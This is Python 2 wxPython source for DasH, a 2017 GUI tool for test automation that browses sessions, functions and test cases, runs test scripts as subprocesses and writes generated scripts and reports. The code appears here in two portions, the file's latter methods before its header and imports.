self.case_suite_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.function_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.session_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.navigator.AddPage(self.session_page, 'SESSION')
self.navigator.AddPage(self.function_page, 'FUNCTION')
self.navigator.AddPage(self.case_suite_page, 'CASE')
self.edit_area = AuiNotebook(self.m_file_editor, style = wx.aui.AUI_NB_DEFAULT_STYLE)
self.edit_area.Bind(wx.aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.on_close_tab_in_edit_area, self.edit_area)
if False:
new_page = FileEditor(self.edit_area, 'a', type= type)
self.edit_area.AddPage(new_page, 'test')
self.tabs_in_edit_area.append(('test'))
self.edit_area.Enable(True)
right_sizer = wx.BoxSizer(wx.VERTICAL)
#right_sizer =wx.GridSizer( 3, 1, 0, 0 )
left_sizer = wx.BoxSizer(wx.HORIZONTAL)
left_sizer.Add(self.m_left_navigator, 1, wx.EXPAND)
self.case_suite_page.Bind(wx.EVT_LEFT_DCLICK, self.m_case_treeOnLeftDClick)
#self.case_suite_page.Bind(wx.EVT_MOUSEWHEEL, self.case_tree_OnMouseWheel)
self.case_suite_page.Bind(wx.EVT_TREE_ITEM_EXPANDING, self.m_case_treeOnTreeItemExpanding)
self.session_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Session_tab)
self.function_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Function_tab)
self.function_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_function_tab)
self.case_suite_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_case_tab)
main_sizer = wx.BoxSizer(wx.HORIZONTAL)
#main_sizer = wx.GridSizer( 1, 2, 0, 0 )
nav_sizer = wx.BoxSizer()
nav_sizer.Add(self.navigator, 1, wx.EXPAND, 1)
self.m_left_navigator.SetSizer(nav_sizer)
#main_sizer = wx.BoxSizer(wx.HORIZONTAL)
#main_sizer.Add(left_sizer, 3, wx.EXPAND)
main_sizer.Add(left_sizer, 2, wx.EXPAND)
edit_sizer = wx.BoxSizer()
edit_sizer.Add(self.edit_area, 1, wx.EXPAND, 1)
self.m_file_editor.SetSizer(edit_sizer)
right_sizer.Add(self.m_file_editor, 6, wx.ALL|wx.EXPAND, 1)
right_sizer.Add(self.m_log, 3, wx.ALL|wx.EXPAND, 2)
right_sizer.Add(self.m_command_box, 0, wx.ALL|wx.EXPAND, 3)
main_sizer.Add(right_sizer, 8, wx.EXPAND)
self.SetSizer(main_sizer)
self.build_session_tab()
self.build_suite_tree()
self.build_function_tab()
ico = wx.Icon('./gui/dash.bmp', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
def on_close(self, event):
self.generate_code(file_name='{}/test_script.py'.format(self.suite_path))
self.generate_report(filename='{}/dash_report.txt'.format(self.log_path))
for index in range(0,self.edit_area.GetPageCount()): #len(self.tabs_in_edit_area)):
closing_page = self.edit_area.GetPage(index)
if isinstance(closing_page, (SessionTab)):
if closing_page:
name = closing_page.name
self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(name))
closing_page.on_close()
self.redir.close()
sys.stderr =self.redir.old_stderr
sys.stdout = self.redir.old_stdout
event.Skip()
def generate_report(self, filename):
report = '''Test Report
RESULT\tScript Name\n'''
if len(self.running_process):
with open(filename, 'a+') as f:
f.write(report)
for pi in self.running_process:
name, pro= pi[:2]
if pro.returncode is None:
result = 'RUNNING'
else:
result = 'PASS' if pro.returncode else 'FAIL'
pid = pro.pid
record = '\t'.join(['{}'.format(x) for x in [result,name]])
report+=record+'\n'
f.write(record+'\n')
def on_close_tab_in_edit_area(self, event):
#self.edit_area.GetPage(self.edit_area.GetSelection()).on_close()
closing_page = self.edit_area.GetPage(self.edit_area.GetSelection())
closing_page.on_close()
if isinstance(closing_page, (SessionTab)):
ses_name = closing_page.name
self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(ses_name))
if globals().has_key(ses_name):
#g = dict(globals())
#globals()[ses_name]=None
#del g[ses_name]
globals()[ses_name].close_session()
del globals()[ses_name]
def add_item_to_subfolder_in_tree(self,node):
subfolder_path_name = self.case_suite_page.GetPyData(node)['path_name']
items = get_folder_item(subfolder_path_name)
if items is None:
self.case_suite_page.SetItemText(node, self.m_case_tree.GetItemText(node) + ' Not Exists!!!')
self.case_suite_page.SetItemTextColour(node, wx.Colour(255, 0, 0))
return
for i in items:
path_name = '{}/{}'.format(subfolder_path_name,i)
base_name = os.path.basename(i)
item_info = wx.TreeItemData({'path_name':path_name})
new_item = self.case_suite_page.InsertItem(node, node, base_name)
self.case_suite_page.SetItemData(new_item, item_info)
if os.path.isdir(path_name):
self.case_suite_page.SetItemHasChildren(new_item)
#self.m_case_tree.ItemHasChildren()
#self.m_case_tree.InsertItem(new_item,new_item,'')
def build_suite_tree(self):
suite_path = self.suite_path #os.path.abspath(self.ini_setting.get('dash','test_suite_path'))
if not os.path.exists(suite_path):
suite_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(suite_path)
root =self.case_suite_page.AddRoot(base_name)
item_info = wx.TreeItemData({'path_name':suite_path})
self.case_suite_page.SetItemData(root, item_info)
self.add_item_to_subfolder_in_tree(root)
self.case_suite_page.Expand(root)
# def OnSelChanged(self, event):
# item = event.GetItem()
# self.display.SetLabel(self.tree.GetItemText(item))
#def case_tree_OnMouseWheel(self, event):
def m_case_treeOnLeftDClick(self, event):
ht_item =self.case_suite_page.GetSelection()
#ht_item = self.HitTest(event.GetPosition())
item_name = self.case_suite_page.GetItemText(ht_item)
item_data = self.case_suite_page.GetItemData(ht_item)
if self.case_suite_page.ItemHasChildren(ht_item):
if self.case_suite_page.IsExpanded(ht_item):
self.case_suite_page.Collapse(ht_item)
else:
self.case_suite_page.ExpandAllChildren(ht_item)
else:
if item_name.lower() in ['.csv', '.xlsx','.xls']:
type = 'grid'
file_name = item_data.Data['path_name']
else:
type = 'text'
file_name = item_data.Data['path_name']
new_page = FileEditor(self.edit_area, 'a', type= type,file_name=file_name)
self.edit_area.AddPage(new_page, item_name)
index = self.edit_area.GetPageIndex(new_page)
self.edit_area.SetSelection(index)
def m_case_treeOnTreeItemExpanding(self,event):
ht_item =self.case_suite_page.GetSelection()
try:
item_info = self.case_suite_page.GetPyData(ht_item)
if 0== self.case_suite_page.GetChildrenCount(ht_item):
if os.path.isdir(item_info['path_name']):
self.add_item_to_subfolder_in_tree(ht_item)
except Exception as e:
pass
def build_session_tab(self):
if self.session_page.RootItem:
self.session_page.DeleteAllItems()
session_path = os.path.abspath(self.ini_setting.get('dash','session_path'))
self.session_path= session_path
if not os.path.exists(session_path):
session_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(session_path)
sessions = {}
root =self.session_page.AddRoot(base_name)
item_info = wx.TreeItemData({'path_name':session_path})
self.session_page.SetItemData(root, item_info)
self.session_page.Expand(root)
item_list = get_folder_item(session_path)
session_files=[]
for item in item_list:
if os.path.isfile('{}/{}'.format(session_path,item)) and '{}'.format(item).lower().strip().endswith('.csv'):
session_files.append(item)
for csv_file in sorted(session_files):
try:
ses_in_bench = load_bench(os.path.abspath('{}/{}'.format(session_path, csv_file)))
for bench in ses_in_bench:
for ses in ses_in_bench[bench]:
if ses_in_bench[bench][ses].has_key('login_step') and ses_in_bench[bench][ses]['login_step'].strip() not in ['', None]:
ses_in_bench[bench][ses].update(
{'login_step': os.path.abspath('{}/{}'.format(session_path, ses_in_bench[bench][ses]['login_step'].strip()))}
)
sessions.update(ses_in_bench)
except Exception as e:
pass
root =self.session_page.GetRootItem()
for file_name in sorted(sessions.keys()):
item_name = os.path.basename(file_name)
item_info = wx.TreeItemData({'file_name':file_name})
new_bench = self.session_page.InsertItem(root, root, item_name)
self.case_suite_page.SetItemData(new_bench, item_info)
for ses in sorted(sessions[file_name]):
item_name = ses
item_info = wx.TreeItemData({'attribute':sessions[file_name][ses]})
new_item = self.session_page.InsertItem(new_bench, new_bench, item_name)
self.case_suite_page.SetItemData(new_item, item_info)
self.session_page.Expand(root)
first_child = self.session_page.GetFirstChild(root)
self.session_page.Expand(first_child[0])
def on_LeftDClick_in_Session_tab(self, event):
event.Skip()
ses_name = self.session_page.GetItemText(self.session_page.GetSelection())
self.session_page.GetItemText(self.session_page.GetSelection())
session_attribute = self.session_page.GetItemData(self.session_page.GetSelection())
if session_attribute.Data.has_key('attribute'):
info(session_attribute.Data['attribute'])
counter =1
original_ses_name = ses_name
while ses_name in self.tabs_in_edit_area:
ses_name= '{}_{}'.format(original_ses_name,counter)
counter+=1
if globals().has_key(ses_name):
if not globals().has_key('_{}'.format(ses_name)):
info("variable '{}' is existed in global, change the name to _{}".format(ses_name, ses_name))
ses_name='_{}'.format(ses_name)
self.session_page.SetItemText(self.session_page.GetSelection(), ses_name)
else:
error(("variable '{}' is existed in global, please change the name".format(ses_name)))
return
new_page = SessionTab(self.edit_area, ses_name, session_attribute.Data['attribute'], self.sequence_queue, log_path=self.log_path)
window_id = self.edit_area.AddPage(new_page, ses_name)
index = self.edit_area.GetPageIndex(new_page)
self.edit_area.SetSelection(index)
self.tabs_in_edit_area.append(ses_name)
self.sessions_alive.update({ses_name: new_page.name})
attribute = session_attribute.Data['attribute']
log_path='a_fake_log_path_for_auto_script'
attribute['log_path']=log_path
self.add_new_session_to_globals(new_page, '{}'.format(attribute))
#globals().update({ses_name: new_page.session})
def add_new_session_to_globals(self, new_page, args_str):
if globals().has_key(new_page.name):
if globals()[new_page.name]==None:
pass
else:
error('{} already '.format(new_page.name))
else:
globals().update({new_page.name: new_page})
self.add_cmd_to_sequence_queue('{} = dut.dut(name= "{}", **{})'.format(new_page.name,new_page.name,args_str.replace("'a_fake_log_path_for_auto_script'",'log_path').replace("'not_call_open': True,", "'not_call_open': False,") ), 'dut')
#session = dut(name, **attributes)
def on_command_enter(self, event):
info('called on_command_enter')
cmd = self.m_command_box.GetValue()
self.m_command_box.Clear()
if cmd.strip()=='':
return
module,class_name, function,args = parse_command_line(cmd)
#args[0]=self.sessions_alive['test_ssh'].session
if module !='' or class_name!='' or function!='':
instance_name, function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module,class_name,function,args, globals())
call_function = None
if class_name!="":
call_function = getattr(instance_name, function_name)
#(*new_argvs,**new_kwargs)
else:
call_function = instance_name#(*new_argvs,**new_kwargs)
th =threading.Thread(target=call_function, args=new_argvs, kwargs=new_kwargs)
th.start()
self.add_cmd_to_history(cmd, module, str_code)
else:
error('"{}" is NOT a valid call in format:\n\tmodule.class.function call or \n\tmodule.function'.format(cmd))
def add_src_path_to_python_path(self, path):
paths = path.split(';')
old_path = sys.path
for p in paths:
if p in old_path:
info('path {} already in sys.path'.format(p))
else:
abspath = os.path.abspath(p)
if os.path.exists(abspath):
sys.path.insert(0,abspath)
else:
warn('path {} is not existed, ignored to add it into sys.path'.format(p))
def on_key_down(self, event):
#error(event.KeyCode)
keycode = event.KeyCode
if keycode ==wx.WXK_TAB:
self.m_command_box.AppendText('\t')
self.on_command_enter(event)
elif keycode == wx.PAPER_ENV_INVITE and wx.GetKeyState(wx.WXK_SHIFT):
self.m_command_box.AppendText('?')
self.on_command_enter(event)
else:
event.Skip()
def on_key_up(self, event):
keycode = event.KeyCode
increase =False
if keycode ==wx.WXK_UP:
pass
elif keycode ==wx.WXK_DOWN:
increase =True#
if keycode in [wx.WXK_UP, wx.WXK_DOWN]:
self.m_command_box.Clear()
self.history_cmd_index, new_command = get_next_in_ring_list(self.history_cmd_index,self.history_cmd,increase=increase)
self.m_command_box.AppendText(new_command)
if keycode in [wx.WXK_TAB]:
pass
else:
event.Skip()
def add_cmd_to_history(self, cmd, module_name, str_code):
if self.history_cmd==[]:
self.history_cmd.append(cmd)
elif self.history_cmd[-1]==cmd:
pass
else:
self.history_cmd.append(cmd)
self.history_cmd_index= len(self.history_cmd)
self.add_cmd_to_sequence_queue(str_code,module_name )
#self.sequence_queue.put([cmd, datetime.now()])
def build_function_tab(self):
src_path = os.path.abspath(self.src_path)
if not os.path.exists(src_path):
src_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(src_path)
root =self.function_page.AddRoot(base_name)
item_info = wx.TreeItemData({'name':src_path})
self.function_page.SetItemData(root, item_info)
modules = get_folder_item(src_path)
if modules is None:
self.function_page.SetItemText(root, self.function_page.GetItemText(root) + ' Not Exists!!!')
self.function_page.SetItemTextColour(root, wx.Colour(255, 0, 0))
return
for module_file in modules:
path_name = '{}'.format(os.path.abspath(self.src_path))
module_name = os.path.basename(module_file).split('.')[0]
new_module = self.function_page.InsertItem(root, root, module_name)
file, path_name, description = imp.find_module(module_name)
lmod = imp.load_module(module_name, file, path_name,description)
for attr in sorted(dir(lmod)):
if attr.startswith('__'):
continue
attr_obj = getattr(lmod, attr)
attr_type = type(attr_obj)
if attr_type == types.FunctionType :
new_item = self.function_page.InsertItem(new_module, new_module, '{}'.format( attr))
item_info = wx.TreeItemData({'name':'{}.{}'.format(module_name,attr)})
self.function_page.SetItemData(new_item, item_info)
elif attr_type== types.TypeType:
class_obj = getattr(lmod, attr)
new_class = self.function_page.InsertItem(new_module, new_module, attr)
item_info = wx.TreeItemData({'name':'{}.{}'.format(module_name,attr)})
self.function_page.SetItemData(new_item, item_info)
for attr_in_class in sorted(dir(class_obj)):
if attr_in_class.startswith('__'):
continue
attr_obj = getattr(class_obj,attr_in_class)
attr_type =type(attr_obj)
if attr_type == types.MethodType :
item_info = wx.TreeItemData({'name':'{}.{}.{}'.format(module_name,attr,attr_in_class)})
new_item = self.function_page.InsertItem(new_class, new_class, attr_in_class)
self.function_page.SetItemData(new_item, item_info)
self.function_page.Expand(root)
first_child = self.function_page.GetFirstChild(root)
self.function_page.Expand(first_child[0])
def on_LeftDClick_in_Function_tab(self,event):
event.Skip()
select_item = self.function_page.GetSelection()
fun_name = self.function_page.GetItemData(select_item)
text_in_tree = self.function_page.GetItemText(select_item)
if fun_name != None and fun_name.Data.has_key('name'):
cmd = fun_name.Data['name']
info('click item in Functions tab: {}'.format(fun_name.Data['name']))
wx.CallAfter(self.m_command_box.Clear)
wx.CallAfter(self.m_command_box.AppendText, cmd+' ')
wx.CallAfter(self.m_command_box.SetFocus)
wx.CallAfter(self.m_command_box.SetInsertionPointEnd)
wx.CallAfter(self.m_command_box.Refresh)
def on_right_down_in_function_tab(self, event):
menu = wx.Menu()
item = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item)
self.Bind(wx.EVT_MENU, self.on_refresh_function_page,item)
self.PopupMenu(menu,event.GetPosition())
def on_refresh_function_page(self, event):
self.function_page.DeleteAllItems()
self.build_function_tab()
info('Refresh Function tab done!')
def add_cmd_to_sequence_queue(self, cmd, module_name):
if self.import_modules.has_key(module_name):
pass
else:
self.import_modules.update({module_name:module_name})
self.sequence_queue.put([cmd,datetime.now() ])
def generate_code(self, file_name ):
str_code ="""#created by DasH
if __name__ == "__main__":
import sys, traceback
sys.path.insert(0,r'{}')
sys.path.insert(0,r'{}')
import lib.common
log_path= '../log/tmp'
log_path= lib.common.create_case_folder()
try:
""".format(self.src_path,self.lib_path )
sessions =[]
for module in self.import_modules:
str_code+=' import {mod}\n'.format(mod=module)#\n {mod}_instance = {mod}()
no_operation = True
while True:
try:
cmd, timestamp =self.sequence_queue.get(block=False)[:2]
str_code +=' {} #{}\n'.format(cmd, timestamp.isoformat( ' '))
if cmd.find('dut.dut(')!=-1:
sessions.append(cmd.split('=')[0].strip())
no_operation=False
#datetime.now().isoformat()
except Exception as e:
break
close_session=''
str_code+=''' except Exception as e:
print(traceback.traceback.format_exc())\n'''
for ses in sessions:
str_code+=''' {}.close_session()\n'''.format(ses)
str_code+=' sys.exit(-1)\n'#, sys.exit(-1)
for ses in sessions:
str_code+=''' {}.close_session()\n'''.format(ses)
info(str_code)
if not no_operation:
with open(file_name, 'a+') as f:
f.write(str_code)
def on_right_down_in_case_tab(self, event):
menu = wx.Menu()
item1 = wx.MenuItem(menu, wx.NewId(), "Run Test")
item2 = wx.MenuItem(menu, wx.NewId(), "Kill Test")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item1)
menu.AppendItem(item2)
self.Bind(wx.EVT_MENU, self.on_run_script,item1)
self.Bind(wx.EVT_MENU, self.on_kill_script,item2)
self.PopupMenu(menu,event.GetPosition())
def on_kill_script(self,event):
hit_item = self.case_suite_page.GetSelection()
item_name = self.case_suite_page.GetItemText(hit_item)
item_data = self.case_suite_page.GetItemData(hit_item).Data
if item_data.has_key('PROCESS'):
p = item_data['PROCESS']
name= item_data['FULL_NAME']
info('script:{}, returncode:{}'.format(name,p.returncode))
if p.returncode is None:
#if p.is_alive():
info('Terminate alive process {}:{}'.format(item_name, p.pid))
p.terminate()
else:
result ='FAIL' if p.returncode else 'PASS'
info('{}:{} completed with returncode {}'.format(item_name, p.pid, result))
def on_run_script(self,event):
hit_item = self.case_suite_page.GetSelection()
item_name = self.case_suite_page.GetItemText(hit_item)
import shlex
lex = shlex.shlex(item_name)
lex.quotes = '"'
lex.whitespace_split = True
script_and_args =list(lex)[1:]
item_data = self.case_suite_page.GetItemData(hit_item).Data
script_name = self.case_suite_page.GetItemData(hit_item).Data['path_name']
from lib.common import run_script
from multiprocessing import Process, Queue
import subprocess
self.on_kill_script(event)
#queue = Queue()
try:
if os.path.exists('script_runner.exe'):
execute = 'script_runner.exe'
cmd = [execute,script_name ]+script_and_args + ['-l','{}'.format(self.log_path)]
#p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)
else:
cmd = [sys.executable, script_name ]+script_and_args+ ['-l','{}'.format(self.log_path)]
p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)
self.case_suite_page.GetItemData(hit_item).Data['PROCESS']=p
self.case_suite_page.GetItemData(hit_item).Data['FULL_NAME']= item_name
info('start process {} :{}'.format(item_name, p.pid))
self.running_process.append([item_name, p])
#p.join() # this blocks until the process terminates
time.sleep(1)
except Exception as e :
import traceback
error(traceback.format_exc())
#p = Process(target=run_script, args=[script_name, script_and_args])
#p.start()
def polling_running_cases(self):
for pid in self.dict_test_report:
for case_name in self.dict_test_report[pid]:
start_time, end_time, duration, tmp_return_code ,proc= [case_name]
#todo: polling proc status and fill report
def add_newe_case_to_report(self, pid, case_name, proc):
start_time=datetime.now()
duration = 0
end_time = None
return_code = None
if pid in self.dict_test_report:
self.dict_test_report[pid].update({case_name:[start_time,end_time, duration, return_code, proc]})
else:
self.dict_test_report[pid]={case_name:[start_time, end_time, duration,return_code, proc ]}
def update_case_status(self, pid,case_name, return_code=None):
now = datetime.now()
start_time, end_time, duration, tmp_return_code ,proc= self.dict_test_report[pid][case_name]
if return_code is None:
duration = (now-start_time).total_seconds()
self.dict_test_report[pid][case_name]=[start_time, end_time, duration, tmp_return_code, proc]
else:
duration = (now-start_time).total_seconds()
self.dict_test_report[case_name][pid]=[start_time, now, duration, return_code, proc]
#p.terminate()
#done: 2017-08-22, 2017-08-19 save main log window to a file
#todo: 2017-08-19 add timestamps to log message
#done: 2017-08-22, 2017-08-19 mail to someone
#todo: 2017-08-19 run a script in DasH
#todo: 2017-08-19 generate test report
#todo: 2017-08-19 publish all test cases in a web page
#todo: 2017-08-19 trigger a test remote via web page
#todo: 2017-08-19 re-run failed cases
#todo: 2017-08-19 build executable packege for DasH
#todo: 2017-08-19 a popup window to get email address/password/mail_server...
#todo: 2017-08-22 output in m_log window has a lot of empty line, need remove them
#todo: 2017-08-23 in common.call_function_in_module, should end all threads which are started in previous instance
#todo: 2017-08-23 add tips for all tree item in teh left |
#!/usr/bin/python
'''The MIT License (MIT)
Copyright (c) 2017 Yu Xiong Wei(try.dash.now@gmail.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.'''
__author__ = 'sean yu (Yu, Xiongwei)'
__doc__ = '''
it's GUI of DasH aka Do as Human
created 2017-05-06 by Sean Yu
'''
import webbrowser
from datetime import datetime
import wx.grid as gridlib
import traceback
import wx
from gui.MainFrame import MainFrame
import os
from lib.common import load_bench, caller_stack_info,info, get_next_in_ring_list,get_folder_item, info,debug, warn, error, parse_command_line, call_function_in_module
import re
import time
import threading
import ConfigParser
import sys
import inspect
import Queue
from SessionTab import SessionTab
import imp
import types
from lib.common import send_mail_smtp_without_login
from lib.common import run_script
from multiprocessing import Process
import subprocess
import shlex
#from dut import dut
DUT={}
class RedirectText(object):
font_point_size = 10
old_stdout = None
old_stderr = None
write_lock = None
log_file = None
error_pattern = None
def __init__(self,aWxTextCtrl, log_path=None):
self.old_stderr , self.old_stdout=sys.stderr , sys.stdout
self.out=aWxTextCtrl
self.font_point_size = self.out.GetFont().PointSize+2
self.write_lock = threading.Lock()
self.error_pattern = re.compile('error|\s+err\s+|fail|wrong|errno')
if log_path:
name = '{}/dash.log'.format(log_path)
self.log_file = open(name, 'w+')
self.fileno = self.log_file.fileno
def write(self,string):
self.write_lock.acquire()
try:
self.old_stdout.write(string)
#string = string.replace('\\033\[[0-9\;]+m', '')
#self.old_stderr.write(string)
err_pattern = self.error_pattern#re.compile('error|\s+err\s+|fail|wrong')
#wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
if False:#err_pattern.search(string.lower()):
last_start = 0
for m in err_pattern.finditer(string.lower()):
#print(m.start(), m.end(), m.group())
#wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
self.out.AppendText( string[last_start:m.start()])
self.out.SetDefaultStyle(wx.TextAttr(wx.RED, wx.YELLOW,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
#wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.RED, wx.YELLOW,font =wx.Font(self.font_point+2, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
self.out.AppendText( string[m.start():m.end()])
last_start= m.end()
#wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
self.out.AppendText( string[last_start:])
else:
self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
wx.CallAfter(self.out.AppendText, string)
if self.log_file:
self.log_file.write(string)
self.log_file.flush()
except:
pass
self.write_lock.release()
def close(self):
if self.log_file:
self.log_file.flush()
self.log_file.close()
def flush(self):
if self.log_file:
self.log_file.flush()
class process_info(object):
process = None
pid=None
full_name=None
returncode = None
def __init__(self,name, process):
self.process= process
self.pid = process.pid
self.full_name =name
self.returncode = process.returncode
@property
def returncode(self):
return self.process.returncode
class FileEditor(wx.Panel):
editor =None
font_size=10
parent=None
type = None
sessions_node =None
function_node =None
case_suite_node =None
full_file_name = None
file_instance = None
def on_close(self):
if self.full_file_name:
data = self.editor.GetValue()
with open(self.full_file_name, 'w') as f:
f.write(data)
f.flush()
#done 2017-9-12: handle close tab in edit_area
def __init__(self, parent, title='pageOne', type ='grid', file_name = None):
wx.Panel.__init__(self, parent)
self.parent = parent
self.type = type
self.full_file_name = file_name
#self.editor = wx.TextCtrl(self, style = wx.TE_MULTILINE|wx.TE_RICH2|wx.EXPAND|wx.ALL, size=(-1,-1))
if type in ['text']:
self.editor = wx.TextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_AUTO_URL|wx.VSCROLL|wx.TE_RICH|wx.TE_MULTILINE&(~wx.TE_PROCESS_ENTER))
#wx.richtext.RichTextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS )
with open(self.full_file_name, 'r') as f:
for line in f.readlines():
self.editor.AppendText(line)
else:
self.editor= gridlib.Grid(self)
self.editor.CreateGrid(50, 5)
col = self.editor.GetNumberCols()
row = self.editor.GetNumberRows()
function_color ='black'
arg_color = 'blue'
for c in range(0, col):
if c < 1 :
self.editor.SetColLabelValue(c, 'Function Name')
else:
self.editor.SetColLabelValue(c, 'arg# {}'.format(c))
for r in range (0, row):
self.editor.SetCellTextColour(r,c,function_color if c <1 else arg_color)
for r in range (0, row):
self.editor.SetCellFont(r, 0, wx.Font(self.font_size,wx.SWISS, wx.NORMAL, wx.BOLD ))
self.editor.Bind( wx.EVT_MOUSEWHEEL, self.editor_OnMouseWheel )
sizer = wx.BoxSizer()
sizer.Add(self.editor, 1, wx.EXPAND)
self.SetSizer(sizer)
def editor_OnMouseWheel(self,event):
min_font_size = 5
interval_step = 2
if event.ControlDown():
pass
else:
return
if event.GetWheelRotation() < 0:
if self.font_size>min_font_size:
self.font_size-=interval_step
else:
self.font_size+=1
if self.type in ['text']:
f =self.editor.GetFont()
f.PointSize= self.font_size
self.editor.SetFont(f)
else:
col = self.editor.GetNumberCols()
row = self.editor.GetNumberRows()
for c in range(0, col):
for r in range (0, row):
f = self.editor.GetCellFont(r, c)
f.PointSize = self.font_size
self.editor.SetCellFont(r, c, f)
self.Refresh()
#wx.StaticText(self, -1, "THIS IS A PAGE OBJECT", (20,20))
#DONE: DasHFrame should handle CLOSE event when closing the app, call on_close_tab_in_edit_area for all opened sessions and files
from functools import wraps
import pprint
def gui_event_thread_handler( func):
@wraps(func)
def inner(func, *args, **kwargs):
ret =None
try:
ret = func(*args, **kwargs)
#th = threading.Thread(target=func,args= args, kwargs=kwargs)
#th.start()
except:
error(traceback.format_exc())
return ret
return inner
class gui_event_decorator():
def __init__(self):
pass
@classmethod
def gui_even_handle(self, func):
def inner(*args, **kwargs):
ret =None
try:
#print('decorator!!!')
#ret = func(*args, **kwargs)
th = threading.Thread(target=func,args= args, kwargs=kwargs)
th.start()
#print('decorator####')
except:
print(traceback.format_exc())
return ret
return inner
class DasHFrame(MainFrame, gui_event_decorator):#wx.Frame
ini_setting = None
#m_left_navigator =None
redir = None
edit_area=None
tabs_in_edit_area = None
src_path = './src/'
sessions_alive=None
sequence_queue=None
history_cmd = []
history_cmd_index = -1
import_modules={'TC':''}
lib_path ='./lib'
log_path = '../log/dash'
session_path = './sessions'
suite_path = '../test_suite'
dict_test_report= ''
alive =True
mail_server=None
mail_to_list=None
mail_from=None
mail_read_url= 'outlook.office365.com'
mail_password = None
mail_user ='nonexistent@dash.com'
case_queue =None
check_case_running_status_lock = None
case_list=None
#session_names={}
web_daemon = None
web_host = None
web_port = 8888
mailed_case_pids= []
timestamp=None
mail_failure =False
last_time_call_on_idle= None
ini_file=None
dict_function_obj= {'instance':{}}
dict_function_files = {}
def __init__(self,parent=None, ini_file = './gDasH.ini'):
